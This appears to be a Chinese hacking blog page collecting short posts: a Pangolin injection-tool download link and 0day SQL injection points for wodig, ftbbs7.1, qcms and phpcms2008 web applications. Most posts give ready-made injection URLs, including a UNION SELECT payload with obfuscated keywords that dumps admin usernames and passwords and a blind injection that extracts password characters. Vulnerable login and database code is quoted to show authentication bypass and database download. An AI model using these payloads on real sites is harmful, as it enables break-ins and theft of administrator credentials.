pangolin2.3.0.948注入工具下载

这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html

收藏、分享这篇文章!

wodig注入漏洞

wodig漏洞文件Default.asp?tags_name=a’

article.asp?Src_Child=1&Src_ChildSub=a’

wodig.asp?tags_name=a’这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络

收藏、分享这篇文章!

ftbbs7.1注入漏洞

Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin

请使用ftbbs的用户关注它的官网安全补丁发布.

收藏、分享这篇文章!

qcms 0day

qcms 0day漏洞如下：
1.可以下载数据库。
2.注入：
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下：
admin_name=trim(request.Form(“admin_name”))
admin_password=trim(request.Form(“admin_password”))
admin_password=md5(admin_password)
if admin_name=”" then
session(“admin_name”)=”"
%>
<SCRIPT LANGUAGE=vbscript>
<!–
msgbox(“请输入用户名!”)
window.self.location.href=”admin_login.asp”
–>
</SCRIPT>
<%
else
if admin_password=”" then
session(“admin_name”)=”"
%>
<SCRIPT LANGUAGE=vbscript>
<!–
msgbox(“请输入密码!”)
window.self.location.href=”admin_login.asp”
–>
</SCRIPT>
<%
else
sql=”select * from admin where admin_name=’”&admin_name&”‘ and admin_password=’”&admin_password&”‘”
很明显，传说的万能密码，重现江湖。

上传漏洞。
没做任何判断，也没有。
也没用权限判断。
代码就不给了，大家自己找。
后台一处
插件：fckeditor
也有上传漏洞，网上有，大家自己看
暴库：
代码如下：
<%
set conn=server.createobject(“adodb.connection”)
conn.open “driver={microsoft access driver (*.mdb)};dbq=”&server.mappath(“/db.mdb”)
%>
没任何处理

这个版本和我向作者提交漏洞的版本不一样！
这个版本没用防注入。

就这几个，简单，但很致命。

后面的这几个版本，我向作者提交了不少漏洞，基本修复，所以只有挑软柿子，给大家讲讲这个版本。

收藏、分享这篇文章!

安全

作者：nuke
受影响程序： phpcms2008 gbk
漏洞文件：ask/search_ajax.php
测试方法：
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23

收藏、分享这篇文章!